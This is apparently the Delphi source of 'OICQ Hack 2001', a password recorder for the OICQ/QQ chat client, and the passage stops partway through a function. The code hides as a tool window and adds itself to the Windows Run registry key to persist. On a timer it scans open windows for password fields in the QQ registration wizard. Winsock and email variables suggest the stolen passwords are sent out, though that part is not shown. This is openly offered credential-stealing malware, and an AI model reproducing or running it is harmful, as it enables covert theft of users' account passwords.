{ ****************** OICQ Hack 2001*********** * * 2001 5.22 ver 1.1 Modify for OICQ2000b 0230 * 2001 5.25 ver 1.2 Modify for QQ2000b 0430 * Last updated: 2001.5.25 * Author :njhhack * HackSoft Research Lab. * Copyright(C) 2001 Allrigths Reserved. * * ********************************************** }
//---------------下面是oicqhack.dpr工程文件 program oicqhack;
uses Windows, Messages, mainunit in ''''mainunit.pas'''';
{$R *.RES}
var wClass: TWndClass; // class struct for main window Msg: TMSG; // message struct
procedure ShutDown; begin UnRegisterClass(classname,hInst); ExitProcess(hInst); //end program end;
function WindowProc(hWnd,Msg,wParam,lParam:Longint):Longint; stdcall; begin Result:=DefWindowProc(hWnd,Msg,wParam,lParam); case Msg of WM_CREATE: wincreate; WM_TIMER: ontimer1; WM_DESTROY: ShutDown; end; end;
begin //如果旧版本已运行,则停止旧版程序,只运行当前新版程序 hmain:=Findwindow(''''HackSoft-Oicq-Password-Recoder'''',''''OICQ 密码记录器2''''); if hmain<>0 then sendmessage(lp,wm_destroy,0,0);
hInst:=GetModuleHandle(nil); // get the application instance classname:=''''HackSoft-Oicq-Password-Recoder''''; with wClass do begin Style:= CS_PARENTDC; hIcon:= LoadIcon(hInst,''''MAINICON''''); lpfnWndProc:= @WindowProc; hInstance:= hInst; hbrBackground:= COLOR_BTNFACE+1; lpszClassName:= classname; hCursor:= LoadCursor(0,IDC_ARROW); end; RegisterClass(wClass); hmain:=CreateWindowEx(WS_EX_TOOLWINDOW,classname,''''OICQ 密码记录器3'''',WS_OVERLAPPEDWINDOW,10,10,120,80,0,0,hInst,nil); //建立一个新的定时器,用来定时扫描系统中的窗口 newtime:=SetTimer(hmain,0,300,nil); //建立消息循环 while(GetMessage(Msg,hmain,0,0))do begin TranslateMessage(Msg); DispatchMessage(Msg); end; //结束定时器 killtimer(hmain,newtime); end.
//-------下面是mainunit.pas单元文件
unit mainunit;
interface
uses Windows, Messages, SysUtils, Classes, winsock, registry; const CRLF=#13#10; var spy:string; hinst,hmain,newtime,count,start,max,fhand,old,olde,lp:integer; his:array[0..100] of integer; syspath:array[0..200] of integer; regservice:function(uThread:integer;uType:integer):Integer;stdcall; libhandle:thandle; classname:array[0..100] of char; items:array[0..4] of string;
err:integer; wsadata:twsadata; fsocket,fport,step:integer; SockAddrIn:TSockAddrIn; hackmail,email,newpass,fhost,s1,password:string; sbuf:array[0..1024] of char;
procedure winCreate; procedure OnTimer1;
implementation
//修改注册表让程序自启动 procedure autorun; var reg:tregistry; begin reg:=tregistry.create; reg.rootkey:=HKEY_LOCAL_MACHINE; reg.openkey(''''SOFTWARE\Microsoft\Windows\CurrentVersion\Run'''',true); reg.WriteString(''''oicqpass'''',spy+''''OICQPASS.EXE''''); reg.closekey; reg.free; end;
//窗口枚举函数 function lpEnumFunc(hwnd:integer;uint:integer):boolean;stdcall; var hw,hwold,hs,wlong,hup,i:integer; sbuf,sb3,sb2:array[0..256] of char; sb1:string; begin hwold:=GetParent(hwnd); wlong:=GetWindowLong(hwnd,GWL_STYLE); if (wlong and ES_PASSWORD)<>0 then begin //检查是否OICQ登陆 hup:=GetParent(hwnd); sendmessage(hup,wm_gettext,100,integer(@sbuf)); strpcopy(sb2,''''OICQ 注册向导''''); strpcopy(sb3,''''QQ 注册向导''''); if (strcomp(sbuf,sb2)=0) or (strcomp(sbuf,sb3)=0) then begin old:=GetParent(hup); old:=GetParent(old); old:=GetParent(old); start:=0; count:=1; //items.clear;